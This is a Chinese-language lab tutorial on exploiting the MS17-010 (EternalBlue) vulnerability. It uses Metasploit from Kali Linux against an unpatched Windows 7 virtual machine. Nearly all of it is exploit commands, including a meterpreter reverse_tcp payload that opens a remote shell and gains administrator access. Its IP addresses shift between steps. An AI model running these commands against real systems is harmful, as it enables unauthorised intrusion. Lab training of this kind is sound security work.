ms17-010-永恒之蓝漏洞利用教程
实验环境:虚拟机:kali-linux windows 7 请自行下载安装
1.打开虚拟机 启动kali-linux 启动windows7(未装补丁)
2.获取IP地址(ifconfig ipconfig)
kali-linux :192.168.0.129
windows7 : 192.168.0.130
3. kali-linux输入msfconsole启动msf(若不是root登陆需sudo提升权限)
root@bogon:~# msfconsole
命令提示行显示msf则启动成功。
4. 使用永恒之蓝漏洞
msf > use exploit/windows/smb/ms17_010_eternalblue
5. 设定靶机 IP 和操作机 IP
192.168.18.129为操作机kali-linux ip地址
192.168.18.130为靶机windows 7 ip地址
msf exploit (windows/smb/ms17_010_eternalblue) > set rhost 192.168.18.130
msf exploit (windows/smb/ms17_010_eternalblue) > set lhost 192.168.18.129
6. 设置TCP连接
msf exploit (windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
7.攻击
msf exploit (windows/smb/ms17_010_eternalblue) > run
测试:
已成功获得windows管理员权限!
本教程所用到
虚拟机:kali-linux (kali官网可以下载)
链接: https://pan.baidu.com/s/1VoRDMYyXkdSATL5qV-3QsQ 密码: sjbs
虚拟机:windows 7 (未打永恒之蓝补丁,镜像msdn也可以下载)
链接: https://pan.baidu.com/s/1tImsefcrDtf8Gi3p8FHc1w 密码: nq9f
本教程由qianxiao996原创,如需转载,请注明出处!谢谢。